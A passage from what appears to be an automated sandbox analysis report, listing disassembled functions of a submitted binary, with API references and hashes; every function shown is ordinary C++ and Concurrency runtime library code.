                                      • Opcode Fuzzy Hash: f26fe44b9a344a0565ef7ac38cb39cd088633c493726429bb978aea5682bad31
                                      • Instruction Fuzzy Hash: 4B5138B3900205ABDB219B698C41FBE77BDEF89730F64422AF859D2182DB36DD00C664
                                      Function 0096E9EA Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __freea$__alloca_probe_16
                                      • String ID: a/p$am/pm
                                      • API String ID: 3509577899-3206640213
                                      • Opcode ID: b8ffbecc1f32227dd55982809d879cba240f97081e4a773cbfd60b497a1648dc
                                      • Instruction ID: 02e6c6b87fdc488282d166b08f6c7824ad9fde8d1770ec69dc5a843e815ed49b
                                      • Opcode Fuzzy Hash: b8ffbecc1f32227dd55982809d879cba240f97081e4a773cbfd60b497a1648dc
                                      • Instruction Fuzzy Hash: 3AD15B39910206CBDB29DF68C895BFEB7B8FF05700F24455AE946AB291D3399D80CB51
                                      Function 008E95D0 Relevance: 9.1, APIs: 6, Instructions: 123COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008E9619
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008E963B
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008E965B
                                      • __Getctype.LIBCPMT ref: 008E96F1
                                      • std::_Facet_Register.LIBCPMT ref: 008E9710
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008E9728
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                      • String ID:
                                      • API String ID: 1102183713-0
                                      • Opcode ID: c177dcedf035f1219cc6b020a5979d40c7e1f5ea087be9c5f671b38d9e9d4189
                                      • Instruction ID: f2472cffd3438be5643a01147d1603cbdbb65c929c58939ab61871f1a6a9bbb9
                                      • Opcode Fuzzy Hash: c177dcedf035f1219cc6b020a5979d40c7e1f5ea087be9c5f671b38d9e9d4189
                                      • Instruction Fuzzy Hash: 5B4122B1D14218CFCB20DF55D881BAEB7F4FB55310F1441AAE846AB392EB70AD45CB91
                                      Function 008EC510 Relevance: 9.1, APIs: 6, Instructions: 119COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008EC545
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008EC567
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008EC587
                                      • __Getcvt.LIBCPMT ref: 008EC620
                                      • std::_Facet_Register.LIBCPMT ref: 008EC657
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008EC66F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcvtRegister
                                      • String ID:
                                      • API String ID: 3552396256-0
                                      • Opcode ID: b36406437f0283db2597a8900889c4b61d3d1e570af51d9b0a00b514a7d50527
                                      • Instruction ID: 78e61fa9a6e981324b461d589412bf71409260653da1d0c4b956e5e3cb3eb5fb
                                      • Opcode Fuzzy Hash: b36406437f0283db2597a8900889c4b61d3d1e570af51d9b0a00b514a7d50527
                                      • Instruction Fuzzy Hash: F641BE71D046599FCB20DF55D841BAAB7B0FF55710F14826EE806AB252EB30FE86CB80
                                      Function 0095320F Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::location::_Assign.LIBCMT ref: 00953250
                                      • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00953258
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00953282
                                      • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0095328B
                                      • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0095330E
                                      • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00953316
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                                      • String ID:
                                      • API String ID: 3929269971-0
                                      • Opcode ID: a2e6692758883e869c1712506bc439e62c376218348fe015e1cb9bbf802ef6b2
                                      • Instruction ID: 5a24ef2d8852850644aa654def5288a44db23a26d8bfa37020f9f39b8a0fc221
                                      • Opcode Fuzzy Hash: a2e6692758883e869c1712506bc439e62c376218348fe015e1cb9bbf802ef6b2
                                      • Instruction Fuzzy Hash: 4F418C35A00609EFCF09DF69C495AADBBB5FF88310F048159E816AB390CB34AE55CF81
                                      Function 008B5240 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 85memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,?,BA3649C5,00000000), ref: 008B52A8
                                      • HeapFree.KERNEL32(00000000,?,BA3649C5,00000000), ref: 008B52AF
                                      • CloseHandle.KERNEL32(?,BA3649C5,76226230,?,BA3649C5,00000000,00000000,00000000), ref: 008B52D9
                                      • CloseHandle.KERNEL32(?,?,BA3649C5,00000000,00000000,00000000), ref: 008B52DE
                                      • CloseHandle.KERNEL32(?,?,BA3649C5,00000000,00000000,00000000), ref: 008B52E3
                                        • Part of subcall function 0093FC80: GetProcessHeap.KERNEL32(00000000,?,?,BA3649C5,0098EB50,000000FF,?,008B528A,BA3649C5,76226230), ref: 0093FCCB
                                        • Part of subcall function 0093FC80: HeapFree.KERNEL32(00000000,?,?,BA3649C5,0098EB50,000000FF,?,008B528A,BA3649C5,76226230), ref: 0093FCD2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Heap$CloseHandle$FreeProcess
                                      • String ID: 0b"v
                                      • API String ID: 3876841697-2229840602
                                      • Opcode ID: 459a6948f4a19117abd4e9581771694542e636fb937f98bf36426dd86fb7776f
                                      • Instruction ID: daf5e25e6abd8e7367f2af86ec8288cfe754b53b2af2692538c82b4e3f455e4d
                                      • Opcode Fuzzy Hash: 459a6948f4a19117abd4e9581771694542e636fb937f98bf36426dd86fb7776f
                                      • Instruction Fuzzy Hash: 1A318271A05614EBDB11DF99DC81F5ABBA4FF49720F144269E914EB3A0D7719C04CF90
                                      Function 0094E959 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0094E99C
                                        • Part of subcall function 0094FE93: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0094FEE2
                                      • GetCurrentThread.KERNEL32 ref: 0094E9A6
                                      • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0094E9B2
                                        • Part of subcall function 0094384F: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 00943861
                                        • Part of subcall function 00943CF6: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 00943CFD
                                      • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0094E9F5
                                        • Part of subcall function 0094FE45: SetEvent.KERNEL32(?,?,0094E9FA,0094F78E,00000000,?,00000000,0094F78E,00000004,0094FE3A,?,00000000,?,?,00000000), ref: 0094FE89
                                      • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0094E9FE
                                        • Part of subcall function 0094F474: __EH_prolog3.LIBCMT ref: 0094F47B
                                        • Part of subcall function 0094F474: List.LIBCONCRT ref: 0094F4AA
                                      • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0094EA0E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                                      • String ID:
                                      • API String ID: 2908504212-0
                                      • Opcode ID: 779bf589c77a63587c00e3446f88081f52113e785beac160e70a022479838fb8
                                      • Instruction ID: 82f249d3ac83fa48378f413d443cfbb7434b0ea2de8d0631361d17c3450c64ba
                                      • Opcode Fuzzy Hash: 779bf589c77a63587c00e3446f88081f52113e785beac160e70a022479838fb8
                                      • Instruction Fuzzy Hash: 3F219D31500B159FCB24EF69C990DABF3F9FF88700700496DE846A7662DB34B905CBA1
                                      Function 0095AA78 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,0095AA6F,0095860F,00984BDE,00000008,00984F36,?,?,?,?,00955737,?,?,BA3649C5), ref: 0095AA86
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0095AA94
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0095AAAD
                                      • SetLastError.KERNEL32(00000000,?,0095AA6F,0095860F,00984BDE,00000008,00984F36,?,?,?,?,00955737,?,?,BA3649C5), ref: 0095AAFF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 9606cede06325d8f2068f22391d97c341038b2afa92c1f54ead1bb60d6663410
                                      • Instruction ID: 77b4acd3a31ec8ed7e9c98ec1d61fd7da15f8ff4b7a73d22f84d4279bcf77c2a
                                      • Opcode Fuzzy Hash: 9606cede06325d8f2068f22391d97c341038b2afa92c1f54ead1bb60d6663410
                                      • Instruction Fuzzy Hash: 99014C3661C3111FA624ABBBAD95E276F4BEB40772720033AF920814F1EF910C48F319
                                      Function 0092C0AB Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C0B2
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C0BC
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • moneypunct.LIBCPMT ref: 0092C0F6
                                      • std::_Facet_Register.LIBCPMT ref: 0092C10D
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C12D
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C14B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                      • String ID:
                                      • API String ID: 113178234-0
                                      • Opcode ID: 87114880ce4fedbef8a23679ec86092295a43edef60cfc24eedeb81b81c8bdd2
                                      • Instruction ID: 1a75e20852b4d16d7ea4610431db289ce29584d1a5c65fe6dc34af53e4b03a07
                                      • Opcode Fuzzy Hash: 87114880ce4fedbef8a23679ec86092295a43edef60cfc24eedeb81b81c8bdd2
                                      • Instruction Fuzzy Hash: 2D11E071844224DBCF01EBA4D856BEE77B4EF84320F240009E412A72E2DF349A41C792
                                      Function 0092C005 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C00C
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C016
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • moneypunct.LIBCPMT ref: 0092C050
                                      • std::_Facet_Register.LIBCPMT ref: 0092C067
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C087
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C0A5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                      • String ID:
                                      • API String ID: 113178234-0
                                      • Opcode ID: 2dadb910255f1cfcc2c20a4b09dd5d6251076b1044e2e1e85836514e6a9f4b41
                                      • Instruction ID: 1a0036421c8e1911f8292b499c2c71f0b704d87995c16a28160ad7823dc98253
                                      • Opcode Fuzzy Hash: 2dadb910255f1cfcc2c20a4b09dd5d6251076b1044e2e1e85836514e6a9f4b41
                                      • Instruction Fuzzy Hash: 9811A0B1945224DBCF05EBA8D856BEE77B4AF84720F244509E411A73E2CF349A40CB91
                                      Function 0092C3E9 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C3F0
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C3FA
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • numpunct.LIBCPMT ref: 0092C434
                                      • std::_Facet_Register.LIBCPMT ref: 0092C44B
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C46B
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C489
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                                      • String ID:
                                      • API String ID: 2509942033-0
                                      • Opcode ID: 4ddb9833fad2cd37661a057bdbb803a5f8bf8deb17ebb2440a54efd949d47d07
                                      • Instruction ID: 3b9f05a93ca49ea04e5bd5a8f59fd87c3fe449f870520da2c2220f3ab8ac876a
                                      • Opcode Fuzzy Hash: 4ddb9833fad2cd37661a057bdbb803a5f8bf8deb17ebb2440a54efd949d47d07
                                      • Instruction Fuzzy Hash: E811A0B19442259BCF04FBA4D856BFE77B5AF94720F240409F411A72E5CF349A44CB91
                                      Function 0092C48F Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C496
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C4A0
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • numpunct.LIBCPMT ref: 0092C4DA
                                      • std::_Facet_Register.LIBCPMT ref: 0092C4F1
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C511
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C52F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                                      • String ID:
                                      • API String ID: 2509942033-0
                                      • Opcode ID: d526c0ed984dd6c3eb1516a3bd4bd148ef17e75895285ae5b7a26230e341ce9d
                                      • Instruction ID: b830998c72a3ebe63eb8df3353085a9f24e55d823b50d862abd2b49ea1212b24
                                      • Opcode Fuzzy Hash: d526c0ed984dd6c3eb1516a3bd4bd148ef17e75895285ae5b7a26230e341ce9d
                                      • Instruction Fuzzy Hash: 8911A0719552289BCF04EFA4D856FEE77B5AF84720F240409F401A72E6CF74EA40DB91
                                      Function 00938DF2 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00938DF9
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00938E03
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • messages.LIBCPMT ref: 00938E3D
                                      • std::_Facet_Register.LIBCPMT ref: 00938E54
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00938E74
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00938E92
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                                      • String ID:
                                      • API String ID: 438560357-0
                                      • Opcode ID: 13d556ef21961af079817185005e5af7995dd851c01df72f9d400d16db299e76
                                      • Instruction ID: a7660333e10fc5c05faeb65123538837bb9007e4bace71c4e31999deb89e1da3
                                      • Opcode Fuzzy Hash: 13d556ef21961af079817185005e5af7995dd851c01df72f9d400d16db299e76
                                      • Instruction Fuzzy Hash: AB119A75904228DBCF14FBA4C856BEE77B4AF84720F640409F405AB3E2CF749A41DB91
                                      Function 00938D4C Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00938D53
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00938D5D
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • collate.LIBCPMT ref: 00938D97
                                      • std::_Facet_Register.LIBCPMT ref: 00938DAE
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00938DCE
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00938DEC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                                      • String ID:
                                      • API String ID: 2363045490-0
                                      • Opcode ID: 65f2474001a417308d885f7328b3e0bbf6e18573b6a727c22d2a558f8c1c88e2
                                      • Instruction ID: fae272f47b0c5c6a1e5f0f408fbc5249d3d2406bf8b8b56f3637998fb6cf88b6
